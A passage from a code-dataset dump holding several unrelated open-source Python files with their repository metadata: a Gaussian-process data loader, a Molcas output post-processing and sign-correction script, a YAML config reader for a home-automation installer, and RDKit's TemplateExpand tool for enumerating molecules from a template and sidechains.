train_Y[np.arange(train_set[1].shape[0]), train_set[1]] = 1
validation_Y = np.zeros((valid_set[1].shape[0], 10))
validation_Y[np.arange(valid_set[1].shape[0]), valid_set[1]] = 1
data = []
data.append({
'train_Y': np.vstack((train_Y, validation_Y)),
'train_X': np.vstack((train_set[0], valid_set[0])),
'test_Y': test_Y,
'test_X': test_set[0],
'id': 0
})
return data
@staticmethod
def sarcos_data():
"""
Loads and returns data of SARCOS dataset for joints 4 and 7. Note that ``X`` is standardized.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Data is originally from this website: http://www.gaussianprocess.org/gpml/data/.
The data is directly imported from the Matlab code on Gaussian process networks. The Matlab code to generate
data is 'data/matlab_code_data/sarcos.m'
"""
data = []
train = pandas.read_csv('data/sarcos/train_' +'.csv', header=None)
test = pandas.read_csv('data/sarcos/test_' + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0:1].values,
'train_X': train.ix[:, 2:].values,
'test_Y': test.ix[:, 0:1].values,
'test_X': test.ix[:, 2:].values,
'id': 0
})
return data
@staticmethod
def sarcos_all_joints_data():
"""
Loads and returns data of SARCOS dataset for all joints.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Data is originally from this website: http://www.gaussianprocess.org/gpml/data/.
The data here is directly imported from the Matlab code on Gaussian process networks.
The Matlab code to generate data is 'data/matlab_code_data/sarcos.m'
"""
data = []
train = pandas.read_csv('data/sarcos/train_all' +'.csv', header=None)
test = pandas.read_csv('data/sarcos/test_all' + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0:6].values,
'train_X': train.ix[:, 7:].values,
'test_Y': test.ix[:, 0:6].values,
'test_X': test.ix[:, 7:].values,
'id': 0
})
return data
|
adezfouli/savigp
|
GP/data_source.py
|
Python
|
apache-2.0
| 13,003
|
[
"Gaussian"
] |
37845f9dd4db2bbc8dd2aacdb37f4768d29e2098fd931f077d0012241667d598
|
'''
This scripts takes care of postprocessing and reorganizing/correcting
data after Molcas scan...
'''
from collections import namedtuple
from argparse import ArgumentParser
import glob
from itertools import repeat
import multiprocessing
import numpy as np
import os
from shutil import copy2
from quantumpropagator import (retrieve_hdf5_data, writeH5file,
npArrayOfFiles, printMatrix2D, createTabellineFromArray,
writeH5fileDict, readWholeH5toDict, chunksOf, err, good, warning,
printDict, stringTransformation3d, calc_g_G, readDirectionFile,
printProgressBar)
def read_single_arguments(single_inputs):
'''
This funcion reads the command line arguments
'''
parser = ArgumentParser()
parser.add_argument("-o", "--outputFolder",
dest="o",
type=str,
help="The location of the output folder")
parser.add_argument("-s", "--scanFolder",
dest="s",
type=str,
help="The location of the Grid folder")
parser.add_argument("-p", "--parallel",
dest="p",
type=int,
help="number of processors if you want it parallel")
parser.add_argument("-d", "--displacement",
dest="d",
nargs='+',
help="Corrector, takes two arguments:\n"
"Folder of h5 files\n"
"Folder of outputs\n")
parser.add_argument("-r", "--refine",
dest="r",
nargs='+',
help="refiner, takes three arguments:\n"
"Folder of non corr with nac\n"
"Folder of corr without nac\n"
"OutputFolder.\n")
args = parser.parse_args()
if args.o != None:
single_inputs = single_inputs._replace(outF=args.o)
if args.s != None:
single_inputs = single_inputs._replace(glob=args.s)
if args.p != None:
single_inputs = single_inputs._replace(proc=args.p)
if args.d != None:
single_inputs = single_inputs._replace(direction=args.d)
if args.r != None:
single_inputs = single_inputs._replace(refine=args.r)
return single_inputs
def createOutputFile(tupleI):
'''
given a projectname, creates single outFile (not yet corrected)
tupleI :: (String,String) <- is composed by (fold,outFol)
fold :: String <- the folder of a single calculation
outFol :: String <- the folder where the output is collected
'''
(fold,outFol) = tupleI
#print('doing ' + fold)
folder = os.path.dirname(fold)
proj = os.path.basename(fold)
root = folder +'/' + proj + '/' + proj
oroot = os.path.join(outFol,proj)
h5rasscf = root + '.rasscf.h5'
h5dipole = root + '.transDip.h5'
h5rassi = root + '.rassi.h5'
h5out = root + '.out'
a_exist = all([ os.path.isfile(f) for f in
#[h5rassi,h5rasscf,h5dipole]]) Soon we will not need out anymore
[h5rassi,h5rasscf,h5out,h5dipole]])
if a_exist:
log = proj + ': all files present'
boolean = True
[geom,aType,ener] = retrieve_hdf5_data(h5rasscf,
['CENTER_COORDINATES',
'CENTER_LABELS',
'ROOT_ENERGIES'])
[dipoles, transDen] = retrieve_hdf5_data(h5dipole,
['SFS_EDIPMOM',
'SFS_TRANSITION_DENSITIES'])
[overlap] = retrieve_hdf5_data(h5rassi,
['ORIGINAL_OVERLAPS'])
nstates = ener.size
nstatesNAC = 8 # states for nac are actually 8
natoms = aType.size
# I want to save only the low left corner of overlap [nstates:,:nstates]
if True:
NAC = parseNAC(h5out,nstatesNAC,natoms)
else:
warning("NAC PARSING TURNED OFF")
NAC = np.zeros((nstatesNAC,nstatesNAC,natoms,3))
outfile = oroot + '.all.h5'
outTuple = [('CENTER_COORDINATES', geom),
('CENTER_LABELS', aType),
('ROOT_ENERGIES', ener),
('DIPOLES', dipoles),
#('CI_VECTORS', ciVect),
#('TRANDENS',transDen),
('OVERLAP', overlap[nstates:,:nstates]),
('NAC', NAC)]
#print(overlap[nstates:,:nstates][:3,:3])
#print(overlap)
#try:
# if (overlap[nstates:,:nstates][:3,:3] == np.zeros((3,3))).all():
# log += 'dioK {}\n'.format(outfile)
#except:
# err(oroot)
try:
writeH5file(outfile,outTuple)
except "Unable to open file":
print(outfile)
# count_nonzero does not work anymore with the new thing
log += ' -> ' + str(np.count_nonzero(NAC)/2)
else:
log = proj + ': this calculation is not completed'
boolean = False
return(log,boolean)
def parseNAC(fileN,nstates,natoms):
'''
I use bash here to quickly get out NAC values
fileOut :: filePath <- the output of molcas
'''
import subprocess
emptyMat = np.zeros((nstates,nstates,natoms,3))
# This is the most problem Bound function I can think of (bash)
command = 'grep -A22 "Total derivative coupling" ' + fileN + " | grep -B14 \"H15\" | grep -v '\-\-' | awk '{print $2, $3, $4}'"
#command = "grep norm: " + fileN + "| awk '{print $2}'"
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
# I am reading a list of lists(triplet) in bytes. I need to separate them
# this parser need to filter out the b'' objects that forms from the function split.
# also, there is a problem with numbers not separated in molcas outputs,
# that is why we replace '-' # with ' -'
outputO = np.array([ getThreeNumbers(x) for x in output.split(b'\n') if x != b''])
outputDivided = list(chunksOf(outputO,natoms))
# I need to fill the NAC matrix with the elements I have...
for index in range(len(outputDivided)):
# indexes of out of diagonal terms
ind1 = np.triu_indices(nstates,1)[0][index]
ind2 = np.triu_indices(nstates,1)[1][index]
emptyMat[ind1, ind2] = outputDivided[index]
# tricky NAC, you're antisymmetric
emptyMat[ind2, ind1] = -outputDivided[index]
return(emptyMat)
def getThreeNumbers(bytestr):
'''
this function exists because Molcas does not always give NAC in a suitable way
sometimes the grepped lines are like this
9736.8701781410642.89824311 4710.70644771
************** 8777.30913244 474.27759987
so I am using a few tricks to convert these values in something big, but still triplets of numbers
'''
res = (bytestr.replace(b'-',b' -')).split(b' ')
noEmpty = [ x for x in res if x != b'' ]
if len(noEmpty) < 3:
ris = [ 9999, 9999, 9999 ]
else:
ris = []
for elem in noEmpty:
try:
val = float(elem)
ris.append(val)
except ValueError:
ris.append(9999)
return(ris)
def unpackThingsFromParallel(listOfval):
'''
this unpacks the result list of tuples from the parallel execution
listOfval :: (String,Boolean) <- all the messages and values packed in
tuples
'''
log = '\n'.join([x[0] for x in listOfval])
length = len(listOfval)
trues = [x[1] for x in listOfval].count(True)
return(log,trues,length-trues)
def makeCubeGraph(phis,gammas,thetas):
'''
This supremely problem bound function, will create a dictionary of
"directions" to run analysis functions across the scan in the right order
'''
graph = {}
gammaI = gammas[0]
phiI = phis[0]
thetaL = thetas[-1]
gammaL = gammas[-1]
phiL = phis[-1]
for k in range(len(thetas)):
for j in range(len(gammas)):
for i in range(len(phis)):
name = '_'.join((phis[i],gammas[j],thetas[k]))
graph[name] = []
if phis[i] == phiI and gammas[j] == gammaI and thetas[k] != thetaL:
succt = '_'.join((phis[i],gammas[j],thetas[k+1]))
graph[name].append(succt)
if phis[i] == phiI and gammas[j] != gammaL:
succg = '_'.join((phis[i],gammas[j+1],thetas[k]))
graph[name].append(succg)
if phis[i] != phiL:
succp = '_'.join((phis[i+1],gammas[j],thetas[k]))
graph[name].append(succp)
# return the INVERSE dictionary, so I know from where I should take the
# correction vector
reverseGraph = dict((v,k) for k in graph for v in graph[k])
first = '_'.join((phis[0],gammas[0],thetas[0]))
return(graph,reverseGraph,first)
def refineStuffs(folderO,folderE,folderOUTPUT,fn1,fn2):
'''
There is a folder, folderO, where there are NAC calculated but the dipoles are not corrected.
Then there is a folder folderE that has the correct dipoles, but nacs are 0.
I use the sign of the dipoles in folderE to correct the NAC when putting them into the new grid
'''
phis1,gammas1,thetas1 = readDirectionFile(fn1)
phis2,gammas2,thetas2 = readDirectionFile(fn2)
rootNameO = os.path.join(folderO,'zNorbornadiene')
rootNameE = os.path.join(folderE,'zNorbornadiene')
rootNameOut = os.path.join(folderOUTPUT,'zNorbornadiene')
flat_range_Phi = phis1[::-1]+phis2[1:]
flat_range_Gamma = gammas1[::-1]+gammas2[1:]
flat_range_Theta = (thetas1[::-1]+thetas2[1:])[::-1]
print('{}\n{}\n{}\n'.format(flat_range_Phi,flat_range_Gamma,flat_range_Theta))
dataToGet = ['DIPOLES', 'NAC']
phiL = len(flat_range_Phi)
gamL = len(flat_range_Gamma)
debug = False
for p, phiLab in enumerate(flat_range_Phi[:]):
for g, gamLab in enumerate(flat_range_Gamma[:]):
for t, theLab in enumerate(flat_range_Theta[:]):
elemT = '{}_{}_{}'.format(phiLab,gamLab,theLab)
THIS = '{}_{}.all.h5'.format(rootNameO,elemT)
NEXT = '{}_{}.corrected.h5'.format(rootNameE,elemT)
OUTN = '{}_{}.refined.h5'.format(rootNameOut,elemT)
[dipolesAllT, nacAllT] = retrieve_hdf5_data(THIS, dataToGet)
[dipolesAllN, nacAllN] = retrieve_hdf5_data(NEXT, dataToGet)
_,nstates,_ = dipolesAllT.shape
cutStates = 8
# I want out of diagonal pairs, so the double loop is correct like this,
# where 0,0 and 1,1 and 2,2 are not taken and corrected.
for i in range(cutStates):
for j in range(i):
uno = dipolesAllT[0,i,j]
due = dipolesAllN[0,i,j]
if debug:
strin = '\np {} g {} t {} i {} j {} 1 {} 2 {}'
print(strin.format(phiLab,gamLab,theLab,i,j,uno,due))
if np.sign(uno) == np.sign(due):
nacAllN[i,j] = nacAllT[i,j]
nacAllN[j,i] = -nacAllT[i,j]
else:
nacAllN[i,j] = -nacAllT[i,j]
nacAllN[j,i] = nacAllT[i,j]
# file handling
allValues = readWholeH5toDict(NEXT)
allValues['DIPOLES'] = dipolesAllN[:,:cutStates,:cutStates]
allValues['NAC'] = nacAllN
writeH5fileDict(OUTN,allValues)
printProgressBar(p*gamL+g,gamL*phiL,prefix = 'H5 refined:')
def correctorFromDirection(folderO,folderE,fn1,fn2):
'''
This function is the corrector that follows the direction files...
suuuuper problem bound
'''
phis1,gammas1,thetas1 = readDirectionFile(fn1)
phis2,gammas2,thetas2 = readDirectionFile(fn2)
#phis = phis[0:3]
#gammas = gammas[0:3]
#thetas = thetas[0:3]
rootNameO = os.path.join(folderO,'zNorbornadiene_')
rootNameE = os.path.join(folderE,'zNorbornadiene_')
graph1,revgraph1,first = makeCubeGraph(phis1,gammas1,thetas1)
graph2,revgraph2,_ = makeCubeGraph(phis2,gammas1,thetas1)
graph3,revgraph3,_ = makeCubeGraph(phis1,gammas2,thetas1)
graph4,revgraph4,_ = makeCubeGraph(phis2,gammas2,thetas1)
graph5,revgraph5,_ = makeCubeGraph(phis1,gammas1,thetas2)
graph6,revgraph6,_ = makeCubeGraph(phis2,gammas1,thetas2)
graph7,revgraph7,_ = makeCubeGraph(phis1,gammas2,thetas2)
graph8,revgraph8,_ = makeCubeGraph(phis2,gammas2,thetas2)
cutAt = 14
# correct first point here - True means "I am the first"
print('\n\n----------THIS IS INITIAL -> cut at {}:\n'.format(cutAt))
newsign = np.ones(cutAt)
correctThis(first,newsign,rootNameE,rootNameO,cutAt,True)
# correct the other here key is file to be corrected VALUE the one where to
# take the correction
#print("{}\n{}\n{}".format(phis,gammas,thetas))
#print(' ')
#printDict(graph)
#print(' ')
#printDict(revgraph)
revgraphSum = {**revgraph8,
**revgraph7,
**revgraph6,
**revgraph5,
**revgraph4,
**revgraph3,
**revgraph2,
**revgraph1}
#print(len(revgraphSum))
for key, value in revgraphSum.items():
fnIn = rootNameO + key + '.all.h5'
if os.path.isfile(fnIn):
print('\n\n----------THIS IS {} from {} -> cut at {}:\n'.format(key,value,cutAt))
fnE = rootNameE + value + '.corrected.h5'
newsign = retrieve_hdf5_data(fnE,'ABS_CORRECTOR')
correctThis(key,newsign,rootNameE,rootNameO,cutAt)
good('Hey, you are using an hardcoded direction file')
def correctThis(elem,oneDarray,rootNameE,rootNameO,cutAt,first=None):
'''
This is the corrector. Go go go
elem :: String <- the label of the h5 file
oneDarray :: np.array(NSTATES) <- this is the 1D vector that tells us how
sign changed in LAST CALCULATION
'''
first = first or False
dataToGet = ['ROOT_ENERGIES','OVERLAP', 'DIPOLES', 'NAC']
fileN = rootNameO + elem + '.all.h5'
# I add a string LOL in front of elem to make it equal to a normal file name, but elem here
# is just the three labels (small dirty fix)
# stringTransformation3d changes the UNITS of the labels, it is not anymore a simple tofloat
phiA,_,gammaA,_,thetA,_ = stringTransformation3d("LOL_" + elem)
[enerAll, overlapsM, dipolesAll, nacAll] = retrieve_hdf5_data(fileN, dataToGet)
if first:
(_, nstates, _) = dipolesAll.shape
overlapsAll = np.identity(nstates)
else:
(nstates, _ ) = overlapsM.shape
overlapsAll = overlapsM # leave this here for now
nacCUT = 8
# let's cut something
energies = enerAll[:cutAt]
dipoles = dipolesAll[:, :cutAt, :cutAt]
overlaps = overlapsAll[:cutAt, :cutAt]
nacs = nacAll[:nacCUT, :nacCUT]
correctionArray1DABS, overlap_one_zero = createOneAndZero(overlaps, oneDarray)
correctionMatrix = createTabellineFromArray(correctionArray1DABS)
new_dipoles = dipoles * correctionMatrix
# here I use the fact that correctionMatrix is ALWAYS 2d
# so I loop over the it
new_nacs = np.empty_like(nacs)
for i in range(nacCUT):
for j in range(nacCUT):
new_nacs[i,j] = nacs[i,j] * correctionMatrix[i,j]
print('\n')
print('This is overlap:')
printMatrix2D(overlaps,2)
print('\n\n')
print('from Previous\n {}\neffective correction:\n {}'.format(oneDarray,correctionArray1DABS))
print('\n\n')
print('this is correction Matrix')
printMatrix2D(correctionMatrix,2)
print('\n\n')
print('These are the old dipoles:')
printMatrix2D(dipoles[0],2)
print('\n\n')
print('These are the new dipoles:')
printMatrix2D(new_dipoles[0],2)
print('\n\n')
print('These are the old NACS:')
printMatrix2D(nacs[:,:,9,1],2)
print('\n\n')
print('These are the new NACS:')
printMatrix2D(new_nacs[:,:,9,1],2)
# file handling
corrFNO = rootNameE + elem + '.corrected.h5'
allValues = readWholeH5toDict(fileN)
allValues['DIPOLES'] = new_dipoles
allValues['NAC'] = new_nacs
allValues['ABS_CORRECTOR'] = correctionArray1DABS
allValues['OVERLAPONEZERO'] = overlap_one_zero
allValues['KINETIC_COEFFICIENTS'] = calc_g_G(phiA,gammaA,thetA)
allValues['ROOT_ENERGIES'] = energies
writeH5fileDict(corrFNO,allValues)
print('\n\nfile {} written'.format(corrFNO))
def createOneAndZero(mat, oneDarray):
'''
mat :: np.array(X,Y) <- an overlap matrix
given a matrix with overlaps this will return an array with 1 and -1
This will determine sign changes for this step.
This function is quite convoluted. Rows are new states, so I go along rows
and seek for the absolute maximum value. if this is negative I put a -1, or
a +1 if it is positive, then I take out the state I just assigned (so it
cannot be assigned again). This is to avoid overlap matrices with double 1
or no 1 at all (they happen).
'''
# Maximum implementation
newMat = np.empty_like(mat)
ind = 0
taken = []
for line in mat:
i = np.copy(line)
i[taken] = 0
maxL,minL = (i.max(),i.min())
if -minL > maxL:
newMat[ind] = np.where(i==minL,-1,0)
take = np.argwhere(i==minL)[0][0]
taken += [take]
else:
newMat[ind] = np.where(i==maxL, 1,0)
take = np.argwhere(i==maxL)[0][0]
taken += [take]
ind+=1
booltest = np.all(np.count_nonzero(newMat,axis = 0) == 1)
# I check if all columns and rows have exactly one one.
newcorrVector = oneDarray @ newMat.T
if not booltest:
print('This is an overlap matrix that you should check')
print('entrance matrix')
printMatrix2D(mat)
print('entrance array:')
print(oneDarray)
print('exit matrix')
printMatrix2D(newMat)
print('exit array:')
print(newcorrVector)
return (newcorrVector,newMat)
single_inputs = namedtuple("single_input", ("direction","refine","glob","outF","proc"))
stringOutput1 = '''
{}
finished -> {}
problems -> {}
file report written
'''
def main():
'''
from a grid frolder to a folder ready to be propagated
'''
fold = '/home/alessio/Desktop/NAC_CORRECTION_NOVEMBER2018'
fn1 = os.path.join(fold, 'directions1')
fn2 = os.path.join(fold, 'directions2')
warning('still an hardcoded direction file')
o_inputs = single_inputs("","","","",1)
inp = read_single_arguments(o_inputs)
if inp.direction == "" and inp.refine == "":
folders = npArrayOfFiles(inp.glob)
fold = folders[:] # this does nothing, but I use it to try less files at the time
pool = multiprocessing.Pool(processes = inp.proc)
resultP = pool.map(createOutputFile, zip(fold, repeat(inp.outF)))
(logAll,finished,problems) = unpackThingsFromParallel(resultP)
results = stringOutput1.format(logAll, finished, problems)
with open('report','w') as f:
f.write(results)
print(results)
elif inp.refine != "":
# here the code for the refining thing. big stuff...
print(inp.refine[0],inp.refine[1],fn1,fn2)
refineStuffs(inp.refine[0],inp.refine[1],inp.refine[2],fn1,fn2)
else:
correctorFromDirection(inp.direction[0],inp.direction[1],fn1,fn2)
if __name__ == "__main__":
main()
|
acuzzio/GridQuantumPropagator
|
Scripts/PostProcessing3dData.py
|
Python
|
gpl-3.0
| 19,928
|
[
"MOLCAS"
] |
ad2975b4acda4644d52dc9b1eb2210e6c738fb7ef5662a423affe74e90559f96
|
"""
@name: PyHouse_Install/src/Install/private.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2016-2016 by D. Brian Kimmel
@license: MIT License
@note: Created May 13, 2016
@Summary: Create .private
Create the /etc/pyhouse/.private.yaml file that will hold the secret information used by the pyhouse system.
HOSTNAME: hostname
MQTT: true
NODE_RED: false
"""
import yaml
Y_FILE = '/etc/pyhouse/.private.yaml'
class Private(object):
def __init__(self):
self.hostname = None
class API(object):
"""
"""
def __init__(self):
self.m_private = Private()
self.read_yaml()
def read_yaml(self):
l_file = open(Y_FILE)
# use safe_load instead load
self.m_private = yaml.safe_load(l_file)
l_file.close()
def write_yaml(self):
l_file = open('newtree.yaml', "w")
yaml.dump(self.m_private, l_file)
l_file.close()
if __name__ == '__main--':
API()
# ## END DBK
|
DBrianKimmel/PyHouse_Install
|
src/Install/private.py
|
Python
|
mit
| 1,018
|
[
"Brian"
] |
5821a80e647083756533f85084c7aa5fc0fa0d2ac5e14c103dca7d3cebbc71c8
|
# $Id: TemplateExpand.py 1053 2008-07-30 12:03:29Z landrgr1 $
#
# Created by Greg Landrum August, 2006
#
#
from rdkit import RDLogger as logging
logger = logging.logger()
logger.setLevel(logging.INFO)
from rdkit import Chem
from rdkit.Chem import Crippen
from rdkit.Chem import AllChem
from rdkit.Chem.ChemUtils.AlignDepict import AlignDepict
import sys
_version="0.8.0"
_greet="This is TemplateExpand version %s"%_version
_usage="""
Usage: TemplateExpand [options] template <sidechains>
Unless otherwise indicated, the template and sidechains are assumed to be
Smiles
Each sidechain entry should be:
[-r] SMARTS filename
The SMARTS pattern is used to recognize the attachment point,
if the -r argument is not provided, then atoms matching the pattern
will be removed from the sidechains.
or
-n filename
where the attachment atom is the first atom in each molecule
The filename provides the list of potential sidechains.
options:
-o filename.sdf: provides the name of the output file, otherwise
stdout is used
--sdf : expect the sidechains to be in SD files
--moltemplate: the template(s) are in a mol/SD file, new depiction(s)
will not be generated unless the --redraw argument is also
provided
--smilesFileTemplate: extract the template(s) from a SMILES file instead of
expecting SMILES on the command line.
--redraw: generate a new depiction for the molecular template(s)
--useall:
or
--useallmatches: generate a product for each possible match of the attachment
pattern to each sidechain. If this is not provided, the first
match (not canonically defined) will be used.
--force: by default, the program prompts the user if the library is
going to contain more than 1000 compounds. This argument
disables the prompt.
--templateSmarts="smarts": provides a space-delimited list containing the SMARTS
patterns to be used to recognize attachment points in
the template
--autoNames: when set this toggle causes the resulting compounds to be named
based on there sequence id in the file, e.g.
"TemplateEnum: Mol_1", "TemplateEnum: Mol_2", etc.
otherwise the names of the template and building blocks (from
the input files) will be combined to form a name for each
product molecule.
--3D : Generate 3d coordinates for the product molecules instead of 2d coordinates,
requires the --moltemplate option
--tether : refine the 3d conformations using a tethered minimization
"""
def Usage():
import sys
print >>sys.stderr,_usage
sys.exit(-1)
nDumped=0
def _exploder(mol,depth,sidechains,core,chainIndices,autoNames=True,templateName='',
resetCounter=True,do3D=False,useTethers=False):
global nDumped
if resetCounter:
nDumped=0
ourChains = sidechains[depth]
patt = '[%d*]'%(depth+1)
patt = Chem.MolFromSmiles(patt)
for i,(chainIdx,chain) in enumerate(ourChains):
tchain = chainIndices[:]
tchain.append((i,chainIdx))
rs = Chem.ReplaceSubstructs(mol,patt,chain,replaceAll=True)
if rs:
r = rs[0]
if depth<len(sidechains)-1:
for entry in _exploder(r,depth+1,sidechains,core,tchain,
autoNames=autoNames,templateName=templateName,
resetCounter=0,do3D=do3D,useTethers=useTethers):
yield entry
else:
try:
Chem.SanitizeMol(r)
except ValueError:
import traceback
traceback.print_exc()
continue
if not do3D:
if r.HasSubstructMatch(core):
try:
AlignDepict(r,core)
except:
import traceback
traceback.print_exc()
print >>sys.stderr,Chem.MolToSmiles(r)
else:
print >>sys.stderr,'>>> no match'
AllChem.Compute2DCoords(r)
else:
r = Chem.AddHs(r)
AllChem.ConstrainedEmbed(r,core,useTethers)
Chem.Kekulize(r)
if autoNames:
tName = "TemplateEnum: Mol_%d"%(nDumped+1)
else:
tName = templateName
for bbI,bb in enumerate(tchain):
bbMol = sidechains[bbI][bb[0]][1]
if bbMol.HasProp('_Name'):
bbNm = bbMol.GetProp('_Name')
else:
bbNm = str(bb[1])
tName += '_' + bbNm
r.SetProp("_Name",tName)
r.SetProp('seq_num',str(nDumped+1))
r.SetProp('reagent_indices','_'.join([str(x[1]) for x in tchain]))
for bbI,bb in enumerate(tchain):
bbMol = sidechains[bbI][bb[0]][1]
if bbMol.HasProp('_Name'):
bbNm = bbMol.GetProp('_Name')
else:
bbNm = str(bb[1])
r.SetProp('building_block_%d'%(bbI+1),bbNm)
for propN in bbMol.GetPropNames():
r.SetProp('building_block_%d_%s'%(bbI+1,propN),bbMol.GetProp(propN))
nDumped += 1
if not nDumped%100:
logger.info('Done %d molecules'%nDumped)
yield r
def Explode(template,sidechains,outF,autoNames=True,do3D=False,useTethers=False):
chainIndices=[]
core = Chem.DeleteSubstructs(template,Chem.MolFromSmiles('[*]'))
try:
templateName = template.GetProp('_Name')
except KeyError:
templateName="template"
for mol in _exploder(template,0,sidechains,core,chainIndices,autoNames=autoNames,
templateName=templateName,do3D=do3D,useTethers=useTethers):
outF.write(Chem.MolToMolBlock(mol))
for pN in mol.GetPropNames():
print >>outF,'> <%s>\n%s\n'%(pN,mol.GetProp(pN))
print >>outF,'$$$$'
def MoveDummyNeighborsToBeginning(mol,useAll=False):
dummyPatt=Chem.MolFromSmiles('[*]')
matches = mol.GetSubstructMatches(dummyPatt)
res = []
for match in matches:
matchIdx = match[0]
smi = Chem.MolToSmiles(mol,True,rootedAtAtom=matchIdx)
entry = Chem.MolFromSmiles(smi)
# entry now has [*] as atom 0 and the neighbor
# as atom 1. Cleave the [*]:
entry = Chem.DeleteSubstructs(entry,dummyPatt)
for propN in mol.GetPropNames():
entry.SetProp(propN,mol.GetProp(propN));
# now we have a molecule with the atom to be joined
# in position zero; Keep that:
res.append(entry)
if not useAll:
break
return res
def ConstructSidechains(suppl,sma=None,replace=True,useAll=False):
if sma:
try:
patt = Chem.MolFromSmarts(sma)
except:
logger.error('could not construct pattern from smarts: %s'%sma,
exc_info=True)
return None
else:
patt = None
if replace:
replacement = Chem.MolFromSmiles('[*]')
res = []
for idx,mol in enumerate(suppl):
if not mol:
continue
if patt:
if not mol.HasSubstructMatch(patt):
logger.warning('The substructure pattern did not match sidechain %d. This may result in errors.'%(idx+1))
if replace:
tmp = list(Chem.ReplaceSubstructs(mol,patt,replacement))
if not useAll: tmp = [tmp[0]]
for i,entry in enumerate(tmp):
entry = MoveDummyNeighborsToBeginning(entry)
if not entry:
continue
entry = entry[0]
for propN in mol.GetPropNames():
entry.SetProp(propN,mol.GetProp(propN));
# now we have a molecule with the atom to be joined
# in position zero; Keep that:
tmp[i] = (idx+1,entry)
else:
# no replacement, use the pattern to reorder
# atoms only:
matches = mol.GetSubstructMatches(patt)
if matches:
tmp = []
for match in matches:
smi = Chem.MolToSmiles(mol,True,rootedAtAtom=match[0])
entry = Chem.MolFromSmiles(smi)
for propN in mol.GetPropNames():
entry.SetProp(propN,mol.GetProp(propN));
# now we have a molecule with the atom to be joined
# in position zero; Keep that:
tmp.append((idx+1,entry))
else:
tmp = None
else:
tmp = [(idx+1,mol)]
if tmp:
res.extend(tmp)
return res
if __name__=='__main__':
import getopt,sys
print >>sys.stderr,_greet
try:
args,extras = getopt.getopt(sys.argv[1:],'o:h',[
'sdf',
'moltemplate',
'molTemplate',
'smilesFileTemplate',
'templateSmarts=',
'redraw',
'force',
'useall',
'useallmatches',
'autoNames',
'3D','3d',
'tethers',
'tether',
])
except:
import traceback
traceback.print_exc()
Usage()
if len(extras)<3:
Usage()
tooLong=1000
sdLigands=False
molTemplate=False
redrawTemplate=False
outF=None
forceIt=False
useAll=False
templateSmarts=[]
smilesFileTemplate=False
autoNames=False
do3D=False
useTethers=False
for arg,val in args:
if arg=='-o':
outF=val
elif arg=='--sdf':
sdLigands=True
elif arg in ('--moltemplate','--molTemplate'):
molTemplate=True
elif arg=='--smilesFileTemplate':
smilesFileTemplate=True
elif arg=='--templateSmarts':
templateSmarts = val
elif arg=='--redraw':
redrawTemplate=True
elif arg=='--force':
forceIt=True
elif arg=='--autoNames':
autoNames=True
elif arg in ('--useall','--useallmatches'):
useAll=True
elif arg in ('--3D','--3d'):
do3D=True
elif arg in ('--tethers','--tether'):
useTethers=True
elif arg=='-h':
Usage()
sys.exit(0)
if do3D:
if not molTemplate:
raise ValueError,'the --3D option is only useable in combination with --moltemplate'
if redrawTemplate:
logger.warning('--redrawTemplate does not make sense in combination with --molTemplate. removing it')
redrawTemplate=False
if templateSmarts:
splitL = templateSmarts.split(' ')
templateSmarts = []
for i,sma in enumerate(splitL):
patt = Chem.MolFromSmarts(sma)
if not patt:
raise ValueError,'could not convert smarts "%s" to a query'%sma
if i>=4:
i+=1
replace = Chem.MolFromSmiles('[%d*]'%(i+1))
templateSmarts.append((patt,replace))
if molTemplate:
removeHs = not do3D
try:
s = Chem.SDMolSupplier(extras[0],removeHs=removeHs)
templates = [x for x in s]
except:
logger.error('Could not construct templates from input file: %s'%extras[0],
exc_info=True)
sys.exit(1)
if redrawTemplate:
for template in templates:
AllChem.Compute2DCoords(template)
else:
if not smilesFileTemplate:
try:
templates = [Chem.MolFromSmiles(extras[0])]
except:
logger.error('Could not construct template from smiles: %s'%extras[0],
exc_info=True)
sys.exit(1)
else:
try:
s = Chem.SmilesMolSupplier(extras[0],titleLine=False)
templates = [x for x in s]
except:
logger.error('Could not construct templates from input file: %s'%extras[0],
exc_info=True)
sys.exit(1)
for template in templates:
AllChem.Compute2DCoords(template)
if templateSmarts:
finalTs = []
for i,template in enumerate(templates):
for j,(patt,replace) in enumerate(templateSmarts):
if not template.HasSubstructMatch(patt):
logger.error('template %d did not match sidechain pattern %d, skipping it'%(i+1,j+1))
template =None
break
template = Chem.ReplaceSubstructs(template,patt,replace)[0]
if template:
Chem.SanitizeMol(template)
finalTs.append(template)
templates = finalTs
sidechains = []
pos = 1
while pos<len(extras):
if extras[pos]=='-r':
replaceIt=False
pos += 1
else:
replaceIt=True
if extras[pos]=='-n':
sma = None
else:
sma = extras[pos]
pos += 1
try:
dat = extras[pos]
except IndexError:
logger.error('missing a sidechain filename')
sys.exit(-1)
pos += 1
if sdLigands:
try:
suppl = Chem.SDMolSupplier(dat)
except:
logger.error('could not construct supplier from SD file: %s'%dat,
exc_info=True)
suppl = []
else:
tmpF = file(dat,'r')
inL = tmpF.readline()
if len(inL.split(' '))<2:
nmCol=-1
else:
nmCol=1
try:
suppl = Chem.SmilesMolSupplier(dat,nameColumn=nmCol)
except:
logger.error('could not construct supplier from smiles file: %s'%dat,
exc_info=True)
suppl = []
suppl = [x for x in suppl]
chains = ConstructSidechains(suppl,sma=sma,replace=replaceIt,useAll=useAll)
if chains:
sidechains.append(chains)
count = 1
for chain in sidechains:
count *= len(chain)
count *= len(templates)
if not sidechains or not count:
print >>sys.stderr,"No molecules to be generated."
sys.exit(0)
if not forceIt and count>tooLong:
print >>sys.stderr,"This will generate %d molecules."%count
print >>sys.stderr,"Continue anyway? [no] ",
sys.stderr.flush()
ans = sys.stdin.readline().strip()
if ans not in ('y','yes','Y','YES'):
sys.exit(0)
if outF and outF!="-":
try:
outF = file(outF,'w+')
except IOError:
logger.error('could not open file %s for writing'%(outF),
exc_info=True)
else:
outF = sys.stdout
for template in templates:
Explode(template,sidechains,outF,autoNames=autoNames,do3D=do3D,
useTethers=useTethers)
|
rdkit/rdkit-orig
|
rdkit/Chem/ChemUtils/TemplateExpand.py
|
Python
|
